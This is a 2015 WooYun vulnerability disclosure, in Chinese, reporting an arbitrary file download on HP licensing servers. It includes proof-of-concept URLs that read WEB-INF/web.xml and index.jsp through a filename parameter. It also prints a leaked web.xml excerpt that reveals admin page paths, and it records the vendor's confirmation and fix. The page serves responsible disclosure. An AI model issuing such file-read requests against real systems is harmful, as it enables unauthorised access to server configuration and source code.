当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127956

漏洞标题:惠普两处任意文件下载

相关厂商:惠普

漏洞作者: 路人甲

提交时间:2015-07-21 11:36

修复时间:2015-08-11 05:18

公开时间:2015-08-11 05:18

漏洞类型:任意文件遍历/下载

危害等级:低

自评Rank:5

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-23: 厂商已经确认,细节仅向厂商公开
2015-08-02: 细节向核心白帽子及相关领域专家公开
2015-08-11: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

惠普两处任意文件下载

详细说明:

http://licensing.hp.com/slm/orangePortal/downloadFile?filename=WEB-INF/web.xml


http://licensing.hp.com/slm/orangePortal/downloadFile?filename=index.jsp


1.PNG


http://webware.hp.com/slm/orangePortal/downloadFile?filename=WEB-INF/web.xml


http://webware.hp.com/slm/orangePortal/downloadFile?filename=index.jsp


2.PNG

漏洞证明:

源代码

8.PNG


从读取的web.xml中存在
<!--+++++++++++++++-->
<!-- Admin Portal -->
<!--+++++++++++++++-->
<servlet>
<description>Admin Page</description>
<display-name>admin.welcome.display</display-name>
<servlet-name>admin.welcome.display</servlet-name>
<jsp-file>/jsp/admin/admin.jsp</jsp-file>
</servlet>
<servlet>
<description>Test CAAS Page</description>
<display-name>test.caas</display-name>
<servlet-name>test.caas</servlet-name>
<jsp-file>/testCAAS.jsp</jsp-file>
</servlet>
<servlet>
<description>Admin CAAS Page</description>
<display-name>admin.caas.display</display-name>
<servlet-name>admin.caas.display</servlet-name>
<jsp-file>/jsp/admin/admin.caas.jsp</jsp-file>
</servlet>
<servlet>
<description>Log Page</description>
<display-name>admin.logs.display</display-name>
<servlet-name>admin.logs.display</servlet-name>
<jsp-file>/jsp/admin/config.logs.jsp</jsp-file>
</servlet>
<servlet>
<description>Product Config Page</description>
<display-name>admin.products.display</display-name>
<servlet-name>admin.products.display</servlet-name>
<jsp-file>/jsp/admin/config.product.jsp</jsp-file>
</servlet>
<servlet>
<description>Download Page</description>
<display-name>admin.download.display</display-name>
<servlet-name>admin.download.display</servlet-name>
<jsp-file>/jsp/admin/admin.download.jsp</jsp-file>
</servlet>
<servlet>
<description>Factory Page</description>
<display-name>admin.factory.display</display-name>
<servlet-name>admin.factory.display</servlet-name>
<jsp-file>/jsp/admin/admin.factory.jsp</jsp-file>
</servlet>
泄露了后台地址

7.PNG

修复方案:

I don't know.

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-07-23 00:22

厂商回复:

最新状态:

2015-08-11:Hello!We have resolved the issue (SSRT102166). The web.xml files are now accessible to only restricted users. Let us know if you have any other questions or concerns.Thanks,HP PSRT